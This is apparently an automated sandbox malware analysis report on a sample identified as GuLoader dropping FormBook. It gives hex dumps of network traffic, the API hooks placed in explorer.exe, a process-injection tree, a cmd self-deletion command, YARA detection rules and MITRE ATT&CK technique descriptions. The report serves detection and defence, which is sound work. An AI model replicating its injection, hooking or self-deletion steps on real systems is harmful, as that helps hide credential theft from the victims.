2021-10-27 18:17:10 UTC	125	IN	Data Raw: c4 90 60 3f 5d 5a c4 ff d5 5f a3 95 55 ad fd c4 f8 c9 c5 c6 30 fc 1c 88 7c 3f 1e 5a 97 8d 54 00 cc 39 7d d2 02 87 0d 22 df e1 78 ba 59 75 8e 73 e0 24 86 16 8d 5f 60 cf 24 46 fb 21 3c bc f9 2f 73 58 1c d0 78 73 09 d5 3a 8f 1f ed 35 a4 a0 b4 37 8f 95 6f ef de ab 0f 34 f2 73 21 3a 4c c7 35 c3 61 e7 45 26 fe 22 92 de 6c 6a 2c 98 3d ad e3 63 40 ab 08 e6 c9 90 1e 8c 77 0a fa a8 bc 5a 83 4c 3f fb 11 88 1e cf 2e c6 de 6c 5d dc b8 6c e9 27 fc 9e 7c 9c dc 37 9b 91 03 77 7f e0 ee 98 4b d3 84 16 f5 67 d5 82 27 e3 0a c4 98 77 f2 30 d6 09 10 72 23 7d 7c fe 49 27 df 11 52 ab e2 b8 42 e7 b9 66 eb 1e 70 29 90 cb 3a 13 ff 28 da 4f 78 5c bf b6 6d 4d cd d7 94 37 6e 8c 45 ef ec ab 53 7e fa 19 ff b6 d2 e9 58 98 83 41 96 08 d1 d4 ca 98 f8 f7 3d ff c8 16 c4 2d 2c 0a c8 46 c4 da Data Ascii: `?]Z_U0\|?ZT9}"xYus$_`$F!</sXxs:57o4s!:L5aE&"lj,=c@wZL?.l]l'\|7wKg'w0r#}\|I'RBfp):(Ox\mM7nES~XA=-,F
2021-10-27 18:17:10 UTC	133	IN	Data Raw: 40 60 6a 1e 83 21 da 0a 38 ad da 95 b2 bd ed 0a 8c a0 39 b4 40 71 41 23 5d 00 64 77 49 42 dc 92 28 9c c5 ca 72 53 e9 56 9c 8b 71 57 8d 85 9b 4c 29 8b 73 8c da 41 4f e3 83 7a cc cc 41 40 49 f4 b4 92 12 6b c2 81 e1 96 a4 b8 db aa a2 91 97 ef 4a 1a 7f 31 1c e8 58 bd 9c e8 94 ca 73 a2 e4 e7 74 87 6b 79 aa 21 f5 b1 b4 24 d9 45 55 31 3f c3 6f 4e 71 9b de e1 a0 90 20 94 31 43 b7 94 30 38 74 7c e9 2b c3 ca d2 c3 77 ff c2 f3 17 92 b1 3e ac b1 0e 2b 4b 98 57 f9 a7 69 83 c0 d1 6a c9 c2 69 60 d3 01 26 bc ee f8 99 4a 9a b0 a6 5c 71 16 46 a9 96 4c b2 35 3d a6 ae 32 f8 dc 8f d3 db b7 80 b2 8e 20 75 c3 12 2e 73 21 f5 b2 e7 a8 db c4 6b ab 36 b0 33 99 65 f2 ce 84 a6 93 e0 c9 40 ea 90 2a ad 06 0f 39 9d 69 f6 ad 96 e3 7d bc 9d 72 33 98 4f b3 d7 26 8b 89 d9 75 0e 9f 69 db c2 Data Ascii: @`j!89@qA#]dwIB(rSVqWL)sAOzA@IkJ1Xstky!$EU1?oNq 1C08t\|+w>+KWiji`&J\qFL5=2 u.s!k63e@*9i}r3O&ui
2021-10-27 18:17:10 UTC	140	IN	Data Raw: dd f9 b2 68 dd ba a8 f1 76 cb be 8d 02 fa d6 a9 b9 bb f9 29 97 8c 37 22 07 9d e0 4a 00 88 96 f4 c4 02 1f 4b fe ef 06 64 09 96 eb 60 cd b2 85 0e e0 10 66 33 ed 39 d8 c4 d9 18 91 21 46 ad dc af 39 b0 4c 09 c1 e2 c3 35 dc 81 48 88 5c 59 74 a4 b3 3e 14 7a ad e6 27 40 be c1 dc 10 36 84 f4 f1 ab bd 0f 17 aa fb e1 3d 5b bc c0 3a a5 3b da 0a 69 ae bc b9 f2 50 7d 58 a3 1d 4b 94 19 97 6c 56 13 28 76 12 e5 0d 21 40 72 5e 94 a3 e5 3e 04 71 95 95 1e 1c 18 b5 81 8f 2c 42 12 db 71 58 78 38 48 45 7d 41 af 11 9b 2e 59 b2 64 b5 d1 67 05 de 9d 7f 1c 49 20 5e 22 03 f1 48 f6 19 7b a1 61 a9 ed f1 cc 4f 18 40 69 bd 1c 0d f4 97 bc e0 e1 bc 13 f9 00 dc d6 27 58 d5 fa 22 e0 d4 a7 1d a1 93 d2 71 a0 08 28 a7 7c a8 ac 76 35 a3 6d e7 15 49 ee 40 ba b8 d0 ea fa 6b 75 a1 69 99 01 5c 65 Data Ascii: hv)7"JKd`f39!F9L5H\Yt>z'@6=[:;iP}XKlV(v!@r^>q,BqXx8HE}A.YdgI ^"H{aO@i'X"q(\|v5mI@kui\e
2021-10-27 18:17:10 UTC	148	IN	Data Raw: e5 d7 84 a5 bd 41 3d 48 7a 48 75 d2 42 bc 31 16 89 0f f8 a1 64 27 cb 74 6d 3d 0a 22 b2 06 0b 01 d3 b3 df 54 b6 1d 78 61 f4 d4 35 03 59 48 84 52 c6 74 b1 bf 50 3d 8c 75 1f fc ff a4 e2 21 5a be e4 20 9b 35 6a 4d d0 8d ed 2d 45 36 e8 46 5e c0 8c e8 ce f2 f4 9a 4a ec b0 43 f6 fa 96 94 4a b5 a0 f9 e5 cf 25 e6 ba b0 a6 ff 51 15 42 72 e9 40 df 06 34 92 a7 b6 04 bd d0 f7 10 42 27 89 3c 4a 7b 3b a8 04 8c f0 39 d3 17 b3 05 c1 20 b0 f7 68 55 db ae 89 ac 75 4d 0c 85 b6 77 51 88 3b 07 ef 46 40 2c 8e 34 66 16 da 4a 14 a1 77 7e 81 c2 e7 34 73 f3 10 69 e8 75 f6 e1 ac b7 79 49 94 6b 59 33 42 35 51 d0 90 61 45 35 1c 94 49 fc 04 65 d2 c7 74 7c 5f 0e 68 3b d9 d3 de 6c 73 24 74 63 0f 9b 60 c1 72 2e 83 b6 47 85 c0 50 5d 77 bd 66 d9 f3 00 88 e0 21 29 27 07 f5 97 41 6b f2 ca ef Data Ascii: A=HzHuB1d'tm="Txa5YHRtP=u!Z 5jM-E6F^JCJ%QBr@4B'<J{;9 hUuMwQ;F@,4fJw~4siuyIkY3B5QaE5Iet\|_h;ls$tc`r.GP]wf!)'Ak
2021-10-27 18:17:10 UTC	156	IN	Data Raw: a8 a8 bf b5 e5 09 fb 09 a1 44 10 81 bb 6f dd ee 81 4c e7 d0 ba 3d 56 88 f8 12 8f 03 e1 16 93 28 ee 78 db bd bf fb 82 31 7a d2 7c 48 f9 10 86 73 c1 da 55 6b eb 3b 12 a2 12 3e 1b a6 f0 76 f3 fe 21 0c a3 3c 40 b5 40 3f 13 c2 53 62 b6 b3 72 5f 4e 72 93 08 0c 8f fb d4 78 b1 e3 b5 66 57 47 75 bb 19 85 cf 5c 18 ef 9b d6 44 58 a0 41 7f 6d 99 fb b9 6e dd 73 ff 88 5d ca 43 f7 6e b1 32 4f 10 03 b9 03 aa 47 85 12 3f 70 14 80 e6 13 b8 81 6c 21 10 bf 30 6a 71 28 c3 9e 32 1f f4 ba fe 47 b5 7c 55 1a 39 a2 70 65 8e 65 b6 81 4b 78 d0 34 2a fe 39 ca dd 8c 83 ae 6b fb f0 27 23 a0 fb b2 79 b7 10 a1 25 a9 53 d6 27 bd eb e4 d4 bd f5 f9 63 5a ee 8a 9e 1c 37 8c 12 0a e3 89 39 f0 13 86 e6 07 43 e5 42 19 38 12 7f c6 d4 98 5a 5d 94 b5 e1 f4 d8 6e 56 0a fe 4a 4d 9d 42 d2 0c 8b f0 f7 Data Ascii: DoL=V(x1z\|HsUk;>v!<@@?Sbr_NrxfWGu\DXAmns]Cn2OG?pl!0jq(2G\|U9peeKx4*9k'#y%S'cZ79CB8Z]nVJMB
2021-10-27 18:17:10 UTC	164	IN	Data Raw: d6 14 ad e4 dd 01 f0 6d 58 56 97 69 aa 77 29 ea eb 66 4d 52 d2 35 bb 48 00 44 72 a5 c3 8e e9 ec 86 fd 48 10 bd 41 2a c0 d5 ef 10 9a 81 1e ba ff f3 c9 7c 16 bc d9 15 34 1f b0 ae c5 09 44 0f ac 0a 52 57 7f 8b fc 1a f3 5d 6a af bb 09 f6 d7 b1 86 a1 86 62 f3 58 b1 c4 b6 83 2b 1f 0c 92 fd 50 f0 77 b9 a6 9f 0c 0c 01 f7 ea 25 ab e2 56 8e b4 0b 84 cb 44 29 f6 78 76 1f d3 37 74 07 c8 71 72 77 80 d0 1c 58 99 1a 63 0c 5c 90 6d 63 9e 61 2f 4b 17 73 ae 30 29 33 47 aa 30 ab 0b 7e 28 fd 84 c0 f0 12 01 73 e1 71 c1 51 f6 c3 4e aa 6d ab 1f cc 34 26 4b 73 26 fc e8 3f 3b 49 ee b1 b4 65 4d 1a 6e 4a 56 64 91 5b 45 6e 2f bc 18 25 e6 c9 3b c3 5c f6 22 c4 2e 29 e8 71 fa 3e 89 2c 88 7d f4 b3 f1 8a 87 13 2a 7b 5d 2e a4 08 2f 01 21 6b 22 17 5b db a0 f6 a3 b3 5d 24 48 c2 e9 61 b0 03 Data Ascii: mXViw)fMR5HDrHA\|4DRW]jbX+Pw%VD)xv7tqrwXc\mca/Ks0)3G0~(sqQNm4&Ks&?;IeMnJVd[En/%;\".)q>,}{]./!k"[]$Ha
2021-10-27 18:17:10 UTC	172	IN	Data Raw: 41 2c 58 f7 a2 8a 82 83 e4 90 06 6c 7a 00 85 24 f2 75 36 92 85 95 8c 6a 74 83 75 1c d7 18 89 45 ee b7 2e e1 fa 9c 19 c0 be b8 23 fc 03 35 21 88 2e 63 15 ea bb 0a 8b 94 8b d9 8f d0 1c b6 7b a0 51 03 f1 0f ed 17 d8 f5 39 c7 c6 9a 92 db 10 fa 07 1e 07 fe dd 72 c3 ba 65 70 47 4c cf d4 33 06 5d 4f 60 06 ca 5e a8 94 23 a6 0f c2 f6 35 85 63 29 9a 24 61 e2 bd c8 0e 5e cf 28 a1 07 09 23 53 56 fa 74 86 21 78 fb 95 c4 dd bc a1 9a 7c 3f 54 aa 86 bf ed 8f 5d b7 cf 72 e5 e2 ed 38 51 6c 41 57 be b7 90 0b 91 6f 3e 35 ef 98 50 0e f5 7b 69 f3 39 67 72 8e f5 32 c7 04 43 de 0d 38 b4 85 82 3b 80 73 ff 0f 42 0d 72 55 7b d6 60 51 61 77 40 cd 71 7d df 36 a3 6b 6b 1e 19 ed 79 73 14 da 3b da 8b 56 4c 51 50 40 c0 93 7e 65 df 9e 83 de f1 b4 e4 82 68 53 20 cf 82 61 59 bc 03 54 ea 47 Data Ascii: A,Xlz$u6jtuE.#5!.c{Q9repGL3]O`^#5c)$a^(#SVt!x\|?T]r8QlAWo>5P{i9gr2C8;sBrU{`Qaw@q}6kkys;VLQP@~ehS aYTG
2021-10-27 18:17:10 UTC	180	IN	Data Raw: 0c e0 6d 3b e7 3d 9e 97 ec 6e c1 9d 92 67 a0 86 8d c5 ef 6e 89 fe 0f 69 b1 7d a7 c3 27 e9 3d 42 37 46 d1 9b 15 b3 10 96 eb 17 76 76 00 0d 54 0b c4 73 1b 8b ee c1 8c 79 d2 62 a9 4f c8 ff 04 e4 79 70 aa 66 5c 58 97 95 ec 09 7c 4e a0 05 54 b4 df c2 51 73 62 5e 2f 27 c3 4a 79 9f 98 26 11 f1 76 a2 ca 8d 56 aa 21 4d 43 75 7c f6 14 fd 82 57 97 ff 24 34 f8 84 8a be cf 6b 16 ae 82 0c d0 21 d6 4f 78 97 36 63 79 75 73 aa bb cb 31 db 9a a0 5a fc 8c e7 c2 0e 89 0c 8a 5e 7b d4 36 08 c3 20 df 96 d5 4a 68 5c 31 c1 c6 1a 62 4d 62 f2 19 da c9 07 f5 aa c8 65 10 be 09 1e a8 84 d7 a0 b4 e9 b3 40 e3 d4 e8 f4 c1 b4 a6 d0 3b c1 e3 a6 bb 2f 10 22 44 0a 89 de fa b9 f6 13 0c e1 e1 75 65 4d c5 28 20 e0 20 e5 f5 60 fa 68 65 76 66 7e 6e 14 a7 3e 7b c1 a9 ff 7e 92 7f d5 89 e5 96 80 db Data Ascii: m;=ngni}'=B7FvvTsybOypf\X\|NTQsb^/'Jy&vV!MCu\|W$4k!Ox6cyus1Z^{6 Jh\1bMbe@;/"DueM( `hevf~n>{~

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEC
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEC
GetMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEC
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEC

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: RYATPPETU.exe PID: 1860 Parent PID: 5936

General

Start time:	20:14:50
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\RYATPPETU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RYATPPETU.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	7A4B8B634D2E94CD1E458AF5918BE3AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: RYATPPETU.exe PID: 2248 Parent PID: 1860

General

Start time:	20:16:05
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\RYATPPETU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RYATPPETU.exe'
Imagebase:	0x7ff797770000
File size:	131072 bytes
MD5 hash:	7A4B8B634D2E94CD1E458AF5918BE3AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3472 Parent PID: 2248

General

Start time:	20:17:11
Start date:	27/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmmon32.exe PID: 5516 Parent PID: 3472

General

Start time:	20:17:40
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0xe90000
File size:	36864 bytes
MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 5608 Parent PID: 5516

General

Start time:	20:17:44
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5612 Parent PID: 5608

General

Start time:	20:17:45
Start date:	27/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report RYATPPETU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets